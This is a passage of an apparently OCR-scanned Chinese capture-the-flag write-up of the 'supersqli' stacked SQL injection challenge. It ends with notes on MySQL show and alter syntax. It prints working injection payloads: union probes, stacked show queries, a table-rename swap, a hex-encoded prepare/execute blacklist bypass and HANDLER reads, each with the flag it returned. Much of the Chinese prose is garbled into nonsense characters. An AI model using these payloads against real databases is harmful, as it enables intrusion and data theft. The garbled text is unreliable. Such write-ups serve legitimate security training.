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array(2) {

[0]=>

string(l) “1”

[1]1=>

string(7) “hahahah”
1

arrav(2) {
[ol=>
string (1) "2
[1]1=>
string(12) “miaomiaomiao”

}

arrav(2) {
[0]1=>
string(6) “114514”
[1]1=>
string(2) “ys”

}

BT B, RIS IR, BT BECR2.

1' order by 1 #

S T EEzZSD

arrav(2) {

[0]1=>

string (1) 17

[1]1=>

string(7) “hahahah”
}

B 2 unionfE N, 1B & T i S R

1' union select 1,2#



ES TH EEES

return preg match(”/select|update delete|drop insert where \./i”, $inject);

RIEMRS RESHHEHHBIENT .
JRERME R, BAREY | SIEALXSQLIEH.

s show databases® H #iE .

0'; show databases; #

arrav (1) {
[0]1=>
string(11) “ctftraining”

}

array(l) {
[0]=>
string(18) “information schema”

}

arrav (1) {
[0]1=>
string(5) “mysql”

}

array(l) {
[0]=>
string(18) “performance schema”

}

arrav (1) {
[0]1=>
string(9) “supersqli”

}

array(l) {
[0]=>
string(4) “test”

}

SR J5 Fl show tables 2RI

0'; show tables; #



arrav (1) {

[0l=>

string(16) “1919810931114514”
1
array (1) {

[0]=>

string(5) “words”
1

MUFHXEAMANR, BAIGZ X Bwords RN A .

1'; show columns from words; #

array(6) {
[0]=>
string(2) "id”
[1]1=>
string(7) "int(10)”
[21=>
string(2) "NO”
[3]=>
string(0) "
[4]=>
NULL
[5]=>
string(0) "

1

arrav(6) {
[0]1=>
string(4) “data”
[1]1=>
string(11) “varchar(20)”
[2]=>
string(2) “NO”
[3]=>
string(0) 7
[4]=>
NULL
[5]=>
string(0) "

RIEHE 1919810931114514 N .

REZE—MAIRA, REABTH, ERARSSEEREH.



0'; show columns from "1919810931114514 " ; #

array(6) {
[0]=>
string(4) "flag”
[1]1=>
string(12) “varchar(100)”
[21=>
string(2) "NO”
[3]=>
string(0)
[4]=>
NULL
[5]=>
string(0)
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1, &g rename &3t words Kk & A HAIIER S .
2, 3t 1919810931114514 L {14 FBA words .
3, 4% words RIFMFMFILZ id .

4, ¥ flag 14~ data .

1'; rename table words to wordl; rename table "1919810931114514° to words;alter table words add id int unsigned
not Null auto_increment primary key; alert table words change flag data varchar(100);#

S TH RE= S0

array(2) {
[0]=>
string(42) "flag{d72af29e-7129-40d0-9871-79ae4761bebd}”
[1]=>

string(l) "1”
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B Aselectiid i€ T, Frilse¥iselect * from ™ 1919810931114514 “HE4T 163 ] mAg
B igpayload®

;SeT@a=0x73656c656374202a20667261T6d20603139313938313039333131313435313460;prepare execsql from @a;execute

execsql;#

B 15 2lflag

e prepare...from... WA EIER), SFHATHRIGHEH.
o execute i R IAT HISQLPreparefl & KISQLIEA]
o SELECTH BAfE—4iEA) Exf AL R RN WRAE, TSETR f— kW — AN B R IE .

B FERAEEIREEE, R

EH¥ 1 RESEY

array (1) {

[0]=>

string (38) “flag{c168d583ed0d4d7196967b28chd0b5e9}”
}

ﬂﬁEﬁEEJElﬁgsis:
BBZEIT TITiHEKKLSE, B —Ewebblack_listfd Bt XE MBI, S REMARHEK. . « BRKET
bt 3% 5 B LA payload:

1'; handler "FlagHere open as "a ; handler "a  read next;#

JaRAEbuu LN KL T payload2, FUERIR—A:

1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#



Black list is so weak for you, isn't it

#E4. 1'; handlerd EEES

array(2) {

[0]=>

string(l) “1”

[1]1=>

string(7) “hahahah”
1

arrav (1) {

[0]=>

string (42) “flag{b1785318-8d6c-4234-b81d-4a6812f6accb}”
1

RATTERMER TXE™, payload:

1'; handler "1919810931114514° open as a ; handler "a  read next;#

B FRRERFIRSE, Rt

ES TH EEES

array(2) {

[0]=>

string(l) “1”

[1]1=>

string(7) “hahahah”
1

arrav (1) {

[0]=>

string (42) “flag{3e4238ff-f349-42d2-9d03-c58a75134b22} "
}

MRK B

S I E S 407 alert , show HIl SQLAHE .

show
TEILIE T select 1 where HITEH T, &w LA#EF show SRIBHEREE R, £4, A4,

show datebases; //Zt# /.



show tables; //#%.

show columns from table; //F&.

alert
ER: BHREMERRF. (&HIN: add |[#BH: alert, change |#%: drop )
Fvk:
o HIN—/N31

alter table " table_name" add " column_name" type;

o MER—1 51

alter table " table_name" drop " column_name" type;

o AT HE KRR

alter table " table_name" alter column " column_name" type;

o HF4
alter table " table_name" change " columnl" " column2" type;

alter table "table name" rename "columnl" to "column2";

SQLAWR uessummmu)

* not null- }&7REFI A EETEi#% NULL 5.
alter table persons modify age int not null;//#& not null %% .

alter table person modify age int null;//HK/H null Z#.

e primary key - NOT NULL #l UNIQUE #145i& . fRETH#, BRES (BEANFINEE) FHE—RR, SMRGERE -
T,

alter table persons add age primary key (id)

o unique -fRIEFEFIMFITLHEHE—RME. (F: LA ZA UNIQUE 438, HEEE —1 PRIMARYKEY 413, )

alter table person add unique (id);//#Hunique %%,

o check-R %] {E FIVEE .

alter table person add check (id>9);



o default-#i % &6 45 51 B HBRIAE
alter table person alter city set default 'chengdu' ;//mysql

alter table person add constraint ab_c default 'chengdu' for city;//SQL Server / MS Access

auto_increment-E 3 {E, BRIAM1FFLE.

foreign key-fRiE—/N& KB ILEE 7 — AR AR SR e Bk,
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